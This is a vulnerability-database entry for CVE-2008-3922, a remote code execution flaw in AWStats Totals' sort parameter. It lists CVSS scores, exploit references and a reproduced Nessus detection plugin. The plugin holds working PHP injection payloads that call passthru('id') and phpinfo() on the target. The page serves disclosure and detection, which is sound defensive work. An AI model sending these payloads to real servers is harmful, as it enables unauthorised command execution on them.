Vulnerabilities > CVE-2008-3922 - Code Injection vulnerability in Telartis BV Awstats Totals

047910
CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
telartis-bv
CWE-94
critical
nessus
exploit available
metasploit
NVD
Published: 2008-09-04
Updated: 2018-10-11

Summary

awstatstotals.php in AWStats Totals 1.0 through 1.14 allows remote attackers to execute arbitrary code via PHP sequences in the sort parameter, which is used by the multisort function when dynamically creating an anonymous PHP function.

Vulnerable Configurations

Part Description Count
Application
Telartis_Bv
5

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

D2sec

name= 1.14 RCE
urlhttp://www.d2sec.com/exploits/awstats_totals_=_1.14_rce.html

Exploit-Db

  • descriptionAWStats Totals =< v1.14 multisort Remote Command Execution. CVE-2008-3922. Webapps exploit for php platform
    fileexploits/php/webapps/17324.rb
    idEDB-ID:17324
    last seen2016-02-02
    modified2011-05-25
    platformphp
    port
    published2011-05-25
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/17324/
    titleAWStats Totals <= 1.14 multisort - Remote Command Execution
    typewebapps
  • descriptionAWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit. CVE-2008-3922. Webapps exploit for php platform
    fileexploits/php/webapps/6368.php
    idEDB-ID:6368
    last seen2016-02-01
    modified2008-09-05
    platformphp
    port
    published2008-09-05
    reporterRicardo Almeida
    sourcehttps://www.exploit-db.com/download/6368/
    titleAWStats Totals awstatstotals.php sort Remote Code Execution Exploit
    typewebapps

Metasploit

descriptionThis module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
idMSF:EXPLOIT/UNIX/WEBAPP/AWSTATSTOTALS_MULTISORT
last seen2020-03-15
modified2017-11-08
published2011-05-25
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/awstatstotals_multisort.rb
titleAWStats Totals multisort Remote Command Execution

Nessus

NASL familyCGI abuses
NASL idAWSTATSTOTALS_SORT_REMOTE_EXEC.NASL
descriptionThe remote web server is running a version of awstatstotals.php which does not properly sanitize its
last seen2020-06-01
modified2020-06-02
plugin id34055
published2008-08-27
reporterThis script is Copyright (C) 2008-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/34055
titleAWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(34055);
  script_version("1.19");
  script_cvs_date("Date: 2018/11/15 20:50:16");

  script_cve_id("CVE-2008-3922");
  script_bugtraq_id(30856);
  script_xref(name:"EDB-ID", value:"17324");

  script_name(english:"AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution");
  script_summary(english:"run a command through awstatstotals.php?sort");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to arbitrary
code execution.");
  script_set_attribute(attribute:"description", value:
"The remote web server is running a version of awstatstotals.php which
does not properly sanitize its 'sort' argument. An attacker can run
arbitrary commands on the remote host within the context of the web
server.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/[email protected]");
  script_set_attribute(attribute:"see_also", value:"https://www.telartis.nl/en/awstats" );
  script_set_attribute(attribute:"solution", value:"Upgrade to Telartis AWStats Totals 1.15");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Awstats Totals <= 1.14 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'AWStats Totals multisort Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_publication_date", value:"2008/08/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (get_kb_item("Settings/disable_cgi_scanning")) exit(0);

port = get_http_port(default: 80);

if (thorough_tests)
  dirs = get_kb_list(string("www/", port, "/content/directories"));
if (isnull(dirs)) dirs = make_list("", "/stat", "/awstatstotals");
dirs = list_uniq(make_list(dirs, cgi_dirs()));
report = "";

attacks = make_list(
'/awstatstotals.php?sort="].passthru(\'id\').exit().%24a["',
'/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}',
'/awstatstotals.php?sort="].phpinfo().exit().%24a["',
'/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}}' );

foreach d (dirs)
{
 foreach a (attacks)
 {
  u = strcat(d, a);
  w = http_send_recv3(method:"GET",item: u, port: port);
  if (isnull(w))
   if (report)
    break;
   else
    exit(0);
  r = w[2];
  if ("phpinfo" >< a)
  {
   if (
     "<title>phpinfo()</title>" >< r && 
     "HTTP_HOST" >< r &&
     "SERVER_PORT" >< r &&
     egrep(string: r, pattern: "X-Powered-By.*PHP/[1-9]\.") &&
     egrep(pattern:"\>PHP Version (.+)\<", string:w[2])
   )
   {
    report = strcat(report, '\n', build_url(port: port, qs: u), '\nran the phpinfo() function command successfully.\n');
    break;
   }
  }
  else
  {
   if (egrep(string: r, pattern: "^uid=[0-9]+.* gid=[0-9]+"))
   {
    report = strcat(report, '\n', build_url(port: port, qs: u), '\nran the id command successfully and produced the following output:\n', chomp(r), '\n');
    break;
   }
  }
 }
 if (report && ! thorough_tests) break;
}

if (report) security_hole(port: port, extra: report);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/101698/awstatstotals_multisort.rb.txt
idPACKETSTORM:101698
last seen2016-12-05
published2011-05-26
reporterPatrick Webster
sourcehttps://packetstormsecurity.com/files/101698/AWStats-Totals-1.14-Remote-Command-Execution.html
titleAWStats Totals 1.14 Remote Command Execution

References